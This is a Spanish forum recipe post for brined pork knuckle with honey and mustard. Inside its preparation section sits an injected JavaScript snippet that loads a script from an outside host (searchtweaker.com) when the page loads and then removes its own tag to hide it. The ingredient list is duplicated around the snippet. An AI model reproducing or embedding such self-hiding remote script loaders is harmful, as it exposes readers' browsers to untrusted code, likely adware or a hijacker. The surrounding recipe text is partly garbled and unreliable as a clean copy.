Codillo en salmuera con miel y mostaza
Página 1 de 1.
Codillo en salmuera con miel y mostaza
[Tienes que estar registrado y conectado para ver esa imagen]
Ingredientes principales
1,750 kg de codillo cocido½ kg de patatas de guarnición30 g de miel50 g de mostazaGranos de mostazaRomeroAceite de olivaSal
Preparación de la receta
(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();1,750 kg de codillo cocido½ kg de patatas de guarnición30 g de miel50 g de mostazaGranos de mostazaRomeroAceite de olivaSal
Preparación de la receta
Para preparar la receta de Codillo en salmuera con miel y mostaza
Sazonar y asar el codillo al horno junto con las patatas, el romero y un poco de aceite durante 45 minutos a 200º C.
Calentar la miel con un poco de agua, la mostaza y los granos de mostaza.
Servir el codillo, las patatas y rociar con la salsa de miel y mostaza.
Lilith
Temas similares
» mostaza
» Pollo frito con miel y sésamo
» Remedios Caseros con la Mostaza
» Salsa vinagreta a la mostaza
» Mejillones a la mostaza [Cocina Francesa]
» Pollo frito con miel y sésamo
» Remedios Caseros con la Mostaza
» Salsa vinagreta a la mostaza
» Mejillones a la mostaza [Cocina Francesa]
Página 1 de 1.
Permisos de este foro:
No puedes responder a temas en este foro.